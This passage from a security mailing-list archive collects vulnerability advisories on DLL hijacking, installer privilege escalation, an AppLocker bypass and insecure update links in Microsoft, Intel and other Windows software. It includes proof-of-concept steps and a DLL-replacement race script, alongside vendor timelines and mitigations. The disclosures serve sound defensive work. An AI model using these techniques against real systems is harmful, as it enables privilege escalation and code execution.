 and save it as UXTheme.dll, DWMAPI.dll, NTMARTA.dll and
 MSI.dll in your %TEMP% directory.

   2. execute IPDT_Installer_4.1.0.24.exe: notice the message boxes
  displayed from the DLLs built in step 1!

   NOTE: on a fully patched Windows 7 SP1, setup64.exe loads at
 least the following 32-bit DLLs from %TEMP%:
 UXTheme.dll, Version.dll, NTMARTA.dll and MSI.dll

 Due to its filename, setup.exe additionally loads WinMM.dll,
 SAMCli.dll, MSACM32.dll, SFC.dll, SFC_OS.dll, DWMAPI.dll and


1. DUMP all those forever vulnerable executable installers and
   self-extractors; provide an .MSI package or an .INF script plus
   a .CAB archive instead!

2. NEVER use an unqualified filename to execute/load an application
   or a DLL, ALWAYS specify their fully qualified pathname!


1. DON'T execute executable self-extractors.

2. NEVER execute executable self-extractors with administrative

3. extract the payload of the self-extractor with a SAFE and SECURE
   unzip.exe into a properly protected directory.

4. exercise STRICT privilege separation: use separate unprivileged
   user accounts and privileged administrator account, DISABLE the
   "security theatre" UAC in the unprivileged user accounts.

stay tuned
Stefan Kanthak

PS: the "portable executable" IPDT_Installer_4.1.024.exe has an
export directory, but does NOT export any symbols: both the
numbers of 

[ADV170017] Defense in depth -- the Microsoft way (part 54): escalation of privilege during installation of Microsoft Office 20xy

2018-05-09 Thread Stefan Kanthak
Hi @ll,

during installation of Microsoft Office 2003 and newer versions
as well as single components of Microsoft Office products, the
executable of the "Office Source Engine", ose.exe, is copied as
"%TEMP%\ose0.exe" and then executed with elevated privileges.

%TEMP% is writable by unprivileged users, using it to store and
then run vulnerable executables with elevated privileges is a
well-known and well-documented beginner's error:
see <>
and <>.
plus <>

JFTR: when a (unattended) installation of Microsoft Office is run
  under SYSTEM account, %TEMP% resolves to %SystemRoot%\Temp\

ose.exe is vulnerable to DLL hijacking: it loads multiple Windows
system DLLs from %TEMP% (its "application directory") instead from
Windows' "system directory" %SystemRoot%\System32\

Dll hijacking is a well-known and well-documented vulnerability:
see <>
and <>,
plus <>

Microsoft published plenty advice/guidance to avoid this beginner's
error: <>,
... which their own developers and their QA but seem to ignore!

Proof of concept:

On a fully patched Windows 7 SP1

1. fetch <>
   and save it as RSAEnh.dll and/or CryptBase.dll in your %TEMP%

2. start the installation of Microsoft Office 2010: use for example
   a product DVD or the installers X17-22390.exe/X17-75062.exe
   available from MSDN or (via <>)
   from <>

3. notice the message boxes displayed from the DLLs saved in

stay tuned
Stefan Kanthak

PS: be sure to read

and update your installation media!


2017-03-12vulnerability report sent to Microsoft

2017-03-13reply from Microsoft: "case 37732 opened"

2017-05-13query from Microsoft, asking for acknowledgement

2017-05-13sent acknowledgement information to Microsoft

2017-09-30notification from Microsoft:
  "We have completed our investigation related to the fix
   for this issue and will be releasing defense-in-depth
   fix in our Oct patch Tuesday release."

2017-10-16notification from Microsoft:
  "this issue was fixed as-planned on 10/10"

2017-10-16requested information about CVE identifier(s) assigned

2017-10-19reply from Microsoft:
  "no CVE identifier assigned; this is a defense-in-depth
   fix, which we dont consider as vulnerability.
   In this case, ose.exe is operating by-design to search
   the application directory for DLLs. Unfortunately this
   does enable the planting of malicious DLLs in the
   install directory, as you mentioned. Because the behavior
   was by-design, we didn't issue a CVE. We did, however,
   improve product functionality here in order to mitigate
   the issue."

2017-10-19OUCH: no, you did NOT fix this vulnerability!

  On a fully patched Windows 7 SP1, the "fixed" OSE.EXE
  for Office 2010 still loads Version.dll, WinHTTP.dll
  and WebIO.dll from its application directory, and the
  "fixed" OSE.EXE for Office 2013 still loads Version.dll;
  only the fixed OSE.EXE for Office 2016 seems not to be
  vulnerable any more: is has NO load-time dependency,
  only runtime dependencies.

  You also failed to provide fixed installation media!

2017-10-20reply from Microsoft:
  "the Defense-in-Depth fix was to modify the installation
   process to restrict ose.exe such that it only searches
   System folders, and does not search %TEMP% for DLLs or
   load them from this folder."

2017-10-20longer mail about their misconceptions, the difference
  between (implicit) load-time and (expicit) runtime
  linking, and several proposals how to REALLY fix this
  vulnerability sent to Microsoft

2017-10-21reply from Microsoft:

Defense in depth -- the Microsoft way (part 53): our MSRC doesn't know how Windows handles PATH

2018-04-10 Thread Stefan Kanthak
Hi @ll,

on their "Security Research & Defense" blog, members of Microsoft's
Security Response Center recently posted 

This blog post but clearly shows that the MSRC doesn't know how Windows
handles the PATH!

Error #1

| The directories that are in the PATH environment variable are always
| admin ACLed and a normal user can't modify contents of these directories.
| What Microsoft won't address (not a vulnerability)
| PATH directory scenarios - Since there can't be a non-admin directory in
| the PATH this can't be exploited.


The user can modify the PATH environment variable as s/he likes and add
arbitrary directories!

1) Start a command prompt, then run the following commands:

   MKDIR "%SystemDrive%\fubar"
   PATH %SystemDrive%\fubar;%PATH%
   START %ComSpec% /K PATH

2) The PATH environment variable is built during user logon from the
   system's PATH, stored in the registry entry
   plus the user's PATH, stored in the registry entry

   To add one or more arbitrary user-controlled directories to this
   persistent PATH, set the latter registry entry, for example via
   control panel.
   When a user does this, control panel broadcasts a WM_SETTINGCHANGE
   to all applications.
   Especially Windows' File Explorer (the "shell") rebuilds the PATH
   environment variable upon receiving this broadcast!

3) To add one or more arbitrary user-controlled directories to an
   applications  PATH, create the registry entry

   See <>

Error #2

| 6. The directories that are listed in the PATH environment variable.
|Note that this does not include the per-application path specified
|by the App Paths registry key. The App Paths key is not used when
|computing the DLL search path.


The per-application path stored beneath the "App Paths" registry key is
prepended (NT 5.x and below) or appended (NT 6.x and above) to the PATH
environment variable when an application is started via one of the
ShellExecute*() functions.

Error #3

| DLL planting issues that fall into the category of PATH directories
| DLL planting are treated as won't fix.


The MSRC also ignores the fact that
is equivalent to adding "" in front of the PATH!

JFTR: loading of DLLs from the CWD can be disabled via
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager]
  (see <>)

stay tuned
Stefan Kanthak

Re: [FD] Defense in depth -- the Microsoft way (part 51): Skype's home-grown updater allows escalation of privilege to SYSTEM

2018-02-15 Thread Stefan Kanthak
"Jeffrey Walton" <> wrote:

> On Fri, Feb 9, 2018 at 1:01 PM, Stefan Kanthak <> 
> wrote:

[ ]

> Not sure if this is related, but:

This is of course related: after Zack Whittacker published
some hundred news outlets, bloggers etc. followed up.
Except Zack Whittacker nobody contacted me.
Many copied his article, some others added their own and wrong
interpretation, even pure fiction, like this "WinBuzz":

| Microsoft today squashed a bug that was found in Skype's updater
| process earlier this week.

Wrong. I reported the vulnerability 5 months ago.
And Microsoft WONTFIX this vulnerability in Skype 7.x

JFTR: <>
  also WONTFIX

[ pure speculation removed ]

| It seems Microsoft found an alternative to rewriting code and fixing
| Skype. the company has decided to effectively kill off the classic
| app. The older version of Skype is no longer available anywhere as a
| download.


Microsoft Update still offers the "classic" Skype for Windows alias
Skype Desktop Client: on Windows 7 (which still has the largest
market share) open Windows' control panel, go to Windows Update,
switch to Microsoft Update (if not done before), and find KB2876229
"Skype for Windows (" beyond the optional updates.

For those who don't want to or can not start Microsoft Update:
the Microsoft Update Catalog offers this and two older versions too

In <> Microsoft states:

| Skype releases new versions of Skype for Windows throughout the year.
| To help you stay current with new functionality| and features of the
| Skype experience, Skype is available through Microsoft Update.
| you will receive the latest version of Skype through Microsoft Update.

NO, you DON'T get the latest version of Skype there!
And Skype doesn't use Microsoft Update to deliver updates.
Microsoft had well over 100 days since they closed MSRC case 40550 to
fix this ...

stay tuned
Stefan Kanthak

Defense in depth -- the Microsoft way (part 52): HTTP used to distribute (security) updates, not HTTPS

2018-02-14 Thread Stefan Kanthak
Hi @ll,

yesterdays "Security update deployment information: February 13, 2018"
<> links the following
MSKB articles for the security updates of Microsoft's Office products:

Alternatively use yesterdays "February 2018 updates for Microsoft Office"
<> and all the MSKB
articles linked there, which are a superset of those named above.

Each of these MSKB articles in turn contains one or two links to the
download pages for the updates, which except 2 (of 22) are of the form
(despite the HTTPS: used for the MSKB articles), ie. they use HTTP
instead of HTTPS, inviting to MitM attacks, ALTHOUGH the server supports HTTPS and even redirects these requests to

JFTR: this bad habit is of course present in ALMOST ALL MSKB articles
  for previous security updates for Microsoft's Office products
  too ... and Microsoft does NOT CARE A B^HSHIT about it!

Microsoft also links all the MSKB articles for their Windows security
updates, for example <>, in
their "Security update deployment information:  , ".

Allmost all of these MSKB articles as well as those for Microsoft's Office
products (see above) in turn contain a link to Microsoft's "Update Catalog",
which ALL are of the form
(despite the HTTPS: used for the MSKB articles), ie. they use HTTP
instead of HTTPS, inviting to MitM attacks, ALTHOUGH the server [*] supports HTTPS!

JFTR: even if you browse the "Microsoft Update Catalog" via
  <> [#],
  ALL download links published there use HTTP, not HTTPS!

That's trustworthy computing ... the Microsoft way!

Despite numerous mails sent to <> in the last years,
and numerous replies "we'll forward this to the product groups", nothing
happens at all.

stay tuned
Stefan Kanthak

[*] is redirected to, which in turn is redirected to, for both HTTP and HTTPS

GET / http/1.1

| HTTP/1.1 302 Found
| Cache-Control: private
| Content-Length: 125
| Content-Type: text/html; charset=utf-8
| Location: /v7/site
| Server: Microsoft-IIS/10.0
| X-AspNet-Version: 4.0.30319
| X-Powered-By: ASP.NET
| Date: Wed, 14 Feb 2018 09:42:51 GMT

| HTTP/1.1 301 Moved Permanently
| Content-Length: 168
| Content-Type: text/html; charset=UTF-8
| Location:
| Server: Microsoft-IIS/10.0
| X-Powered-By: ASP.NET
| X-Frame-Options: DENY
| Date: Wed, 14 Feb 2018 09:42:51 GMT

| HTTP/1.1 302 Redirect
| Content-Length: 164
| Content-Type: text/html; charset=UTF-8
| Location:
| Server: Microsoft-IIS/10.0
| X-Powered-By: ASP.NET
| X-Frame-Options: DENY
| Date: Wed, 14 Feb 2018 09:42:51 GMT

| HTTP/1.1 200 OK
| Cache-Control: private
| Content-Length: 11135
| Content-Type: text/html; charset=utf-8
| Server: Microsoft-IIS/10.0
| X-AspNet-Version: 4.0.30319
| X-Powered-By: ASP.NET
| X-Frame-Options: DENY
| Strict-Transport-Security: max-age=31536000; includeSubDomains
| Date: Wed, 14 Feb 2018 09:42:53 GMT

[#] if your browser attemps to connect to these servers with HTTP/2,
it fails: they use a blacklisted cipher suite with HTTP/2, see


Defense in depth -- the Microsoft way (part 51): Skype's home-grown updater allows escalation of privilege to SYSTEM

2018-02-12 Thread Stefan Kanthak
Hi @ll,

since about two or three years now, Microsoft offers Skype as
optional update on Windows/Microsoft Update.

JFTR: for Microsoft's euphemistic use of "update" see

Once installed, Skype uses its own proprietary update mechanism
instead of Windows/Microsoft Update: Skype periodically runs
under the SYSTEM account.
When an update is available, Updater.exe copies/extracts another
executable as "%SystemRoot%\Temp\SKY.tmp" and executes it
using the command line
"%SystemRoot%\Temp\SKY.tmp" /QUIET

This executable is vulnerable to DLL hijacking: it loads at least
UXTheme.dll from its application directory %SystemRoot%\Temp\
instead from Windows' system directory.

An unprivileged (local) user who is able to place UXTheme.dll or
any of the other DLLs loaded by the vulnerable executable in
%SystemRoot%\Temp\ gains escalation of privilege to the SYSTEM

The attack vector is well-known and well-documented as CAPEC-471:

Microsoft published plenty advice/guidance to avoid this beginner's
error: <>,
... which their own developers and their QA but seem to ignore!

See <>
for the same vulnerability in another Microsoft product!

stay tuned
Stefan Kanthak


2017-09-02vulnerability report sent to vendor

2017-09-03reply from vendor: "MSRC case 40550 opened"

2017-09-06notification from vendor's case manager: "report passed
  to product group for investigation"

2017-10-27reply from vendor's case manager:

  "The engineers provided me with an update on this case.
   They've reviewed the code and were able to reproduce
   the issue, but have determined that the fix will be
   implemented in a newer version of the product rather
   than a security update. The team is planning on shipping
   a newer version of the client, and this current version
   will slowly be deprecated. The installer would need a
   large code revision to prevent DLL injection, but all
   resources have been put toward development of the new

2018-02-09report published

Defense in depth -- the Microsoft way (part 49): fun with application manifests

2018-01-30 Thread Stefan Kanthak
Hi @ll,

Microsoft built several bugs^W^Wfollowing features into the
processing of (external) application manifests, i.e. XML files
named .exe.manifest which can accompany any portable
executable .exe

JFTR: the file extension ".exe" is only used per convention;
  CreateProcess() and Windows module loader execute
  portable executables independent of their file extension.

Feature #1:

External application manifests must have "execute file"
permission (although Windows module loader only reads them).

Demonstration/proof of concept:

On Windows 7, Windows Vista and Windows Embedded POSReady 2009
(alias Windows XP SP3) create empty files CScript.exe.manifest,
MSHTA.exe.manifest and/or WScript.exe.manifest in the "system"
directory %SystemRoot%\System32\, add the NTFS ACE "(D;;WP;;;WD)"
meaning "deny execution for everybody" to these files, then start
CScript.exe, MSHTA.exe and/or WScript.exe via Start->Execute
or per double-click ... and notice the message box telling you
"access denied".

The Win32 error code returned by CreateProcess() is indeed

On newer versions of Windows, find an arbitrary executable file
without embedded application manifest to reproduce this feature.

Feature #2:

The "encoding" XML property of application manifests must have
the value UTF-8.

Demonstration/proof of concept:

On Windows XP^WEmbedded POSReady 2009 and newer versions of
Windows, create the following perfectly valid XML file:

--- dummy.exe.manifest ---

--- EOF ---

Add it as resource of type 24 alias RT_MANIFEST with index 1
to an arbitrary portable executable, or place it next to a
portable executable "dummy.exe" without embedded application
manifest, then start "dummy.exe" via Start->Execute or per
double-click ... and notice the message box telling you
"The application can not be started. ..."

The Win32 error code returned by CreateProcess() is

Replacing US-ASCII with UTF-7, ISO-8859-1, Windows-1252 or any
other valid XML encoding except UTF-8 yields the same result.

stay tuned
Stefan Kanthak

[CVE-2017-5688] Executable installers are vulnerable^WEVIL (case 52): Intel installation framework allows arbitrary code execution with escalation of privilege

2017-05-31 Thread Stefan Kanthak
Hi @ll,

executable installers built with Intels Installation Framework,
for example "Intel SSD Toolbox - v3.4.3.exe", available from
<>, expose two
vulnerabilities, both resulting in arbitrary code execution
with escalation of privilege.

Vulnerability #1:

On a fully patched Windows 7 SP1 they load and execute (at least)
Cabinet.dll, Version.dll, RichEd20.dll, UXTheme.dll or DMWAPI.dll
(on other versions of Windows different DLLs may be affected)
from the directory they are stored (their so-called "application
directory") instead Windows' "system directory"
%SystemRoot%\System32\", resulting in arbitrary code execution.

DLL hijacking is a 20 year old, well-known and well-documented
vulnerability, and a typical (but ubiquituous) beginner's error:
see <>,
<> and
<> plus
<!execute.html> for more

For software downloaded with a web browser the "application
directory" is typically the user's "Downloads" directory: see
<> and
<> plus
<> and

Due to the specification "requireAdministrator" in the application
manifest embedded within the executable, installers like
"Intel SSD Toolbox - v3.4.3.exe" run with administrative privileges
("protected" administrators are prompted for consent, unprivileged
standard users are prompted for an administrator password),
resulting in an escalation of privilege!

If (one of) the DLLs named above get(s) planted in the users
"Downloads" directory, for example per "drive-by download", this
vulnerability becomes a remote code execution WITH escalation of

Proof of concept/demonstration:

1. visit <>,
   and save it as Cabinet.dll in your "Downloads" directory, then
   copy it as Version.dll, RichEd20.dll, UXTheme.dll and DWMAPI.dll;

2. visit <>, download
   and save it in your "Downloads" directory;

3. execute "Intel SSD Toolbox - v3.4.3.exe" from your "Downloads"

4. notice the message boxes displayed from the DLLs placed in
   step 1: PWNED!

Mitigation & detection:

* NEVER run executable installers from your "Downloads" directory;

* dump/avoid executable installers, use *.MSI instead!

* see <!execute.html> plus

* also see <>

Vulnerability #2:

On EVERY version of Windows these installers create UNSAFE
(sub)directories "%TEMP%\IIF.tmp\", "%TEMP%\IIF.tmp\Lang\"
and "%TEMP%\IIF.tmp\Lang\-\", extract some dozen
DLLs "%TEMP%\IIF.tmp\Lang\-\setup.exe.dll" and load
ALL of them with administrative privileges.

An unprivileged attacker^Wuser can replace these DLLs between their
creation and their use, again resulting in elevation of privilege.

See <> and
<> for this
well-known and well-documented vulnerability.

Proof of concept/demonstration:

1. visit <>,
   then download
   and save it in an arbitrary directory;

2. save the following batch script in the same directory:

   --- IIF.CMD ---
   @If Not Exist "%TEMP%\IIF.tmp" Goto :WAIT
   For /D %%! In ("%TEMP%\IIF.tmp") Do Set IIFTMP=%%!
   For /R "%IIFTMP%" %%! In (setup.exe.dll) Do Copy SENTINEL.DLL "%%!"
   Set IIFTMP=
   --- EOF ---

Defense in depth -- the Microsoft way (part 47): "AppLocker bypasses are not serviced via monthly security roll-ups"

2017-03-21 Thread Stefan Kanthak
Hi @ll,

Windows 8 and newer versions (Windows 7 and Windows Server 2008 R2
with KB2532445 or KB3125574 installed too) don't allow unprivileged
callers to circumvent AppLocker and SAFER rules via


See <>
and <>

| If this value is used, the system does not check AppLocker rules
| or apply Software Restriction Policies for the DLL. This action
| applies only to the DLL being loaded and not to its dependencies.
| This value is recommended for use in setup programs that must
| run extracted DLLs during installation.
| Windows Server 2008 R2 and Windows 7:
| On systems with KB2532445 installed, the caller must be running
| as "LocalSystem" or "TrustedInstaller"; otherwise the system
| ignores this flag.

Unprivileged users can but bypass AppLocker or SAFER alias Software
Restriction Policies via

CreateProcess(TEXT(""), NULL, NULL, NULL, FALSE,

on ALL versions from Windows XP to Windows 10!

See <>

| Allows the caller to execute a child process that bypasses the
| process restrictions that would normally be applied automatically
| to the process.


Create an "AppCert.Dll" that exports CreateProcessNotify and
set the following registry entry


Note: AppCertDlls are loaded at the first call of one of the
  CreateProcess*() functions. Process creation is denied
  if one of them returns STATUS_UNSUCCESSFUL from its
  CreateProcessNotify() routine when called with the flag

--- APPCERT.C ---
#pragma comment(linker, "/DLL")
#ifdef _WIN64
#pragma comment(linker, "/EXPORT:CreateProcessNotify,PRIVATE")
#pragma comment(linker, 
#pragma comment(linker, "/NOENTRY")



NTSTATUS NTAPI CreateProcessNotify(LPCWSTR lpApplicationName, ULONG ulReason)

switch (ulReason)
// called once for each process that is to be created
// return STATUS_SUCCESS to allow process creation or
// return STATUS_UNSUCCESSFUL to deny process creation

if (forbidden(lpApplicationName))


// called once for each process that is allowed creation



// called once for each process that is denied creation




// the return value is only used for PROCESS_CREATION_QUERY,
// all other conditions are ignored

return ntStatus;
--- EOF ---

stay tuned
Stefan Kanthak


2017-03-10sent vulnerability report to vendor

2017-03-10reply from vendor: MSRC case 37727 opened

2017-03-13reply from vendor: product team is working on case

2017-03-21reply from vendor:
  "The product team has finished their investigation and
   determined this will be serviced in a future version
   of Windows. AppLocker bypasses are not serviced via
   monthly security roll-ups; only major version updates."

2017-03-21<> but serviced
  a bypass with a hotfix which was incorporated in later
  security updates and is included in the "convenience"
  rollup <>

2017-03-21reply from vendor:
  "If you want this fixed immediately and are an
   enterprise customer you'll need to work with your
   Account Manager to open a support case."

2017-03-21report published

Executable installers are vulnerable^WEVIL (case 46): Pelles C allows arbitrary code execution

2017-01-22 Thread Stefan Kanthak
Hi @ll,

the executable installers of "Pelle's C",
<> and,
<>, available
from <>, are vulnerable
to DLL hijacking: they load (tested on Windows 7) at least the
following DLLs from their "application directory" instead Windows'
"system directory": Version.dll, MSI.dll, UXTheme.dll, DWMAPI.dll,
RichEd20.dll and CryptBase.dll

See <>,
<> and
<> for this
well-known and well-documented vulnerability^WBEGINNER'S ERROR!

For programs downloaded from the internet the "application
directory" is typically the user's "Downloads" directory; see

If one of the DLLs named above is placed in the users "Downloads"
directory (for example per "drive-by download") this vulnerability
becomes a remote code execution.

JFTR: there is ABSOLUTELY no need for executable installers on
  Windows! DUMP THIS CRAP!

JFTR: naming a program "Setup.exe" is another beginner's error:
  Windows' does some VERY special things when it encounters
  this filename!


* Don't use executable installers! NEVER!
  Don't use self-extractors! NEVER!

  See <> and
  <> plus
  <!execute.html> alias
  <!execute.html> for more

* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of every "%USERPROFILE%";
  use <> to
  decode it to "deny execution of files in this directory for
  everyone, inheritable to all files in all subdirectories".

stay tuned
Stefan Kanthak


2017-01-05sent vulnerability report to author

  no reply, not even an acknowledgement of receipt

2017-01-13resent vulnerability report to author

  no reply, not even an acknowledgement of receipt

2017-01-21report published

Executable installers are vulnerable^WEVIL (case 41): EmsiSoft's Emergency Kit allows elevation of privilege for everybody

2016-11-17 Thread Stefan Kanthak
Hi @ll,

in response to <>
EmsiSoft fixed some of the DLL hijacking vulnerabilities in some
of their executable installers and unpackers.

EmsisoftEmergencyKit.exe still has beginner's errors which allow
escalation of privilege for EVERY local user:

0. while the self-extracting WinRAR archive EmsisoftEmergencyKit.exe
   doesn't load DLLs from its "application directory" any more, its
   payload but shows this vulnerability!

1. due to "requireAdministrator" in its application manifest the
   self-extractor runs with administrative rights, although it
   neither needs them nor uses them.

2. it creates the directory "%SystemDrive%\EEK" and unpacks its
   payload into it.

   JFTR: since it runs with administrative rights the self-
 extractor could create "%SystemDrive%\EEK" with an ACL
 that only allows write-access for administrators, or
 use "%ProgramFiles%\EmsiSoft\Emergency Kit" instead.

   This directory inherits the ACL of its parent, %SystemDrive%,
   which allows write access for unprivileged users; they can thus
   modify all files extracted there or add files, for example a

   Also give NetAPI32.dll, NetUtils.dll, SrvCli.dll, WksCli.dll,
   PropSys.dll, AppHelp.dll, NTMarta.dll, Secur32.dll, MPR.dll and
   CSCAPI.dll a try.

3. the programs "%SystemDrive%\EEK\Start Commandline Scanner.exe"
   and "%SystemDrive%\EEK\Start Emergency Kit Scanner.exe" have
   "requireAdministrator" in their application manifests too: they
   load and execute the DLLs named above from "%SystemDrive%\EEK"
   with administrative rights.

4. the other programs extracted to "%SystemDrive%\EEK\bin32" and
   "%SystemDrive%\EEK\bin64" and are also run with administrative

5. of course the programs in "%SystemDrive%\EEK\bin32" and
   "%SystemDrive%\EEK\bin64" load and execute DLLs from their
   "application directory" (which is writable for everyone) too.

And one more:

6. the OpenSSL libraries shipped are from version 1.0.2d and have
   multiple vulnerabilities which have beed fixed in version 1.0.2j.

stay tuned
Stefan Kanthak


2016-08-29vulnerability report sent to vendor

2016-08-29vendor acknowledges vulnerability, promises to update
  at least the OpenSSL libraries, and ask the author of
  WinRAR to add a directive to protect the created EEK

2016-11-17vendor fixed NOTHING in the past ELEVEN weeks, and
  does not react any more -> report published

Defense in depth -- the Microsoft way (part 44): complete failure of Windows Update

2016-10-20 Thread Stefan Kanthak
Hi @ll,

since more than a year now, Windows Update fails (not only, but most
notably) on FRESH installations of Windows 7/8/8.1 (especially their
32-bit editions), which then get NO security updates at all [°]!

One of the many possible causes: Windows Update Client runs out of
(virtual) memory during the search for updates and yields 0x8007000E
alias E_OUTOFMEMORY ['].

According to <>

| This update addresses an issue in which Windows Update scans can
| fail and generate a 0x8007000E error.

and <>

| Fix for a Windows Update error 0x8007000E on some computers while
| they are updating.

this has been fixed in recent versions of the Windows Update Client.

BUT: Windows Update does NOT get/fetch this updated Windows Update
 Client and is stuck!

The first action Windows Update Client performs when it contacts the
update servers (which happens as soon as an internet connection is
available, see <>) is to
update itself ... on Windows 7 to version 7.6.7600.320, which is but
COMPLETELY outdated [²]!

Despite the completely outdated version distributed for self-update via
Windows Update, the Windows Update Client makes no further attempts to
update itself; see the following lines from C:\Windows\WindowsUpdate.log:

| 2016-10-06 22:23:01:815  860 dec Agent *
| 2016-10-06 22:23:01:815  860 dec Agent ** START **  Agent: Finding updates 
[CallerId = AutomaticUpdates]
| 2016-10-06 22:23:01:815  860 dec Agent *
| 2016-10-06 22:23:01:815  860 dec Agent   * Online = Yes; Ignore download 
priority = No
| 2016-10-06 22:23:01:815  860 dec Agent   * Criteria = "IsInstalled=0 and 
DeploymentAction='Installation' or IsPresent=1 and
DeploymentAction='Uninstallation' or IsInstalled=1 and 
DeploymentAction='Installation' and RebootRequired=1 or IsInstalled=0 and
DeploymentAction='Uninstallation' and RebootRequired=1"
| 2016-10-06 22:23:01:815  860 dec Agent   * ServiceID = 
{9482F4B4-E343-43B6-B170-9A65BC822C77} Windows Update
| 2016-10-06 22:23:01:815  860 dec Agent   * Search Scope = {Machine}
| 2016-10-06 22:23:01:815  860 dec Setup Checking for agent SelfUpdate
| 2016-10-06 22:23:01:815  860 dec Setup Client version: Core: 7.6.7600.320  
Aux: 7.6.7600.320
| 2016-10-06 22:23:05:184  860 dec Setup SelfUpdate handler update NOT 
required: Current version: 7.6.7600.320, required version:

See <> for instructions
for a fix and some more information!

stay tuned
Stefan Kanthak

[°] since this happens during the search for updates these searches
NEVER finish. As result, Windows Update doesn't notify the user
that Windows is not up-to-date and misses critical/important
security updates!

['] when this happens on FRESH installations of Windows 7, manual
installation of KB3124275 alias MS16-001 (the latest update
for Internet Explorer 8, which is part of Windows 7) helps.
This prunes the search tree sufficiently to avoid this error.

[²] the same holds for <>,
titled "How to update the Windows Update Agent to the latest version",
which too offers version 7.6.7600.320 for Windows 7.
There are at least 10 later versions of the Windows Update Client
for Windows 7: KB3050265, KB3065987, KB3075851, KB3083324, KB3083710,
KB3102810, KB3112343, KB3135445, KB3138612 and KB3161647 (and even
more for Windows 8/8.1)!

Defense in depth -- the Microsoft way (part 45): filesystem redirection fails to redirect the application directory

2016-10-20 Thread Stefan Kanthak
Hi @ll,

on x64 editions of Windows, RegEdit.exe exists both as
%windir%\regedit.exe and %windir%\SysWOW64\regedit.exe.

<> states

| [...] whenever a 32-bit application attempts to access [...]
| %windir%\regedit.exe is redirected to %windir%\SysWOW64\regedit.exe.

But what is the "application directory" when a 32-bit application
runs %windir%\regedit.exe?
Is it %windir% or %windir%\SysWOW64, i.e. is it determined before
or after the redirection?

Remember that the "application directory" comes first in the
standard/default DLL search order, as documented in

Since the 32-bit system DLLs are located in %windir%\SysWOW64, NOT
in %windir%, this makes a difference...

1. compile the following source as 32-bit program:

--- POC.C ---
#pragma comment(lib, "KERNEL32.LIB")

#pragma comment(linker, "/ENTRY:WinMainCRTStartup")
#pragma comment(linker, "/SUBSYSTEM:Windows")


void WinMainCRTStartup()

if (!CreateProcess("C:\\Windows\\regedit.exe", "* /M",

if (WaitForSingleObject(pi.hProcess, INFINITE) == WAIT_FAILED)

if (!CloseHandle(pi.hThread))

if (!CloseHandle(pi.hProcess))

--- EOF ---

2. download <> and
   extract its contents to %windir%:
  WUSA.EXE /Extract:REGEDIT.CAB %windir%
   (yes, this needs administrative privileges, but that's NOT the
   point here).

   The 32-bit DLLs in REGEDIT.CAB are transparent proxies: they
   export all symbols and ordinals of their counterparts found in
   the "system directory" and forward them to these counterparts.

--- FORWARD.C ---
#pragma comment(linker, "/DLL")
#pragma comment(linker, "/ENTRY:_DllMainCRTStartup")
#pragma comment(linker, 
#pragma comment(linker, 
#pragma comment(linker, "/SUBSYSTEM:Windows")



return TRUE;
--- EOF ---

   See <> for details.

3. run the program compiled in step 1: notice the message boxes
   displayed from the DLLs extracted to %windir% in step 2 and
   loaded by %windir%\SysWOW64\regedit.exe: the "application
   directory" of %windir%\SysWOW64\regedit.exe is %windir%\, NOT

   Or use the 32-bit NTSD.EXE run %windir%\regedit.exe: you'll see
   the message boxes too plus the debugger output as shown in

4. finally use the 64-bit NTSD.EXE to run %windir%\regedit.exe:
   see <> for the
   debugger output.

   Notice that the 32-bit forwarder DLLs are loaded in the 64-bit
   process and that their exports/forwards are processed properly!

   Their DllMain() extry points are but NOT called (if they were
   you'd see some message boxes)!

stay tuned
Stefan Kanthak

PS: the test whether 64-bit forwarder DLLs placed in %windir% are
loaded in the 32-bit process %windir%\SysWOW64\regedit.exe is
left as an exercise to the reader.

Defense in depth -- the Microsoft way (part 42): Sysinternals utilities load and execute rogue DLLs from %TEMP%

2016-08-11 Thread Stefan Kanthak
Hi @ll,

several of Microsoft's Sysinternals utilities extract executables
to %TEMP% and run them from there; the extracted executables are
vulnerable to DLL hijacking, allowing arbitrary code execution in
every user account and escalation of privilege in "protected
administrator" accounts [*].

* CoreInfo.exe:
  extracts on x64 an embedded CoreInfo64.exe to %TEMP% which loads
%TEMP%\VERSION.DLL (on Windows Vista and newer)
  and executes it with the callers credentials.

* Disk2VHD.exe:
  extracts on Windows 2003 and newer, both x86 and x64, an embedded
  Disk2VHD-tmp.exe to %TEMP% which loads
%TEMP%\VERSION.DLL (on Windows Vista and newer),
  and executes it with administrative privileges on Windows Vista
  and newer, and with the callers credentials on Windows 2003.

* DiskView.exe:
  extracts on x64 an embedded DiskView64.exe to %TEMP% which loads
  and executes it with administrative privileges on Windows Vista
  and newer, and with the callers credentials on Windows 2003 and
  Windows XP.

* ProcMon.exe:
  extracts on x64 an embedded ProcMon64.exe to %TEMP% which loads
%TEMP%\VERSION.DLL (on Windows Vista and newer),
  and executes it with the callers credentials.

* RAMMap.exe:
  extracts on x64 an embedded RAMMap64.exe to %TEMP% which loads
%TEMP%\SETUPAPI.DLL (on Windows 2003),
%TEMP%\VERSION.DLL (on Windows Vista and newer),
  and executes them with administrative privileges on Windows Vista
  and newer, and with the callers credentials on Windows 2003.

* VMMap.exe:
  extracts on x64 an embedded VMMap64.exe to %TEMP% which loads
%TEMP%\CLBCATQ.DLL (on Windows 2003),
%TEMP%\SETUPAPI.DLL (on Windows 2003),
%TEMP%\VERSION.DLL (on Windows Vista and newer),
  and executes them with the callers credentials.

* ZoomIt.exe:
  extracts on x64 an embedded ZoomIt64.exe to %TEMP% which loads
%TEMP%\SETUPAPI.DLL (on Windows 2003),
%TEMP%\VERSION.DLL (on Windows Vista and newer)
  and executes them with the callers credentials.

See <>,
<> and
<> for these
WELL-KNOWN and WELL-DOCUMENTED vulnerabilities^Wbeginner's


* Don't use these vulnerable utilities (or other crapware
  which runs executables from unsafe directories like %TEMP%)!

* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of "%TEMP%"; use
  <> to
  decode it to "deny execution of files in this directory for
  everyone, inheritable to all files in all subdirectories".

stay tuned
Stefan Kanthak

[*] according to Microsoft's own SIR reports, more than half of
the Windows installations which send telemetry data have only
one active user account, i.e. some hundred million Windows
installations are susceptible to this design bug!


2015-11-02vulnerability report sent to author and vendor

  NO REPLY from author

2015-11-17vendor replies, opens MSRC case 31724

2016-01-29vendor replies, closes MSRC case 31724: WONTFIX

2016-08-11report published

Defense in depth -- the Microsoft way (part 41): vulnerable by (poor implementation of bad) design

2016-07-25 Thread Stefan Kanthak
rd user accounts with DISABLED UAC-elevation.

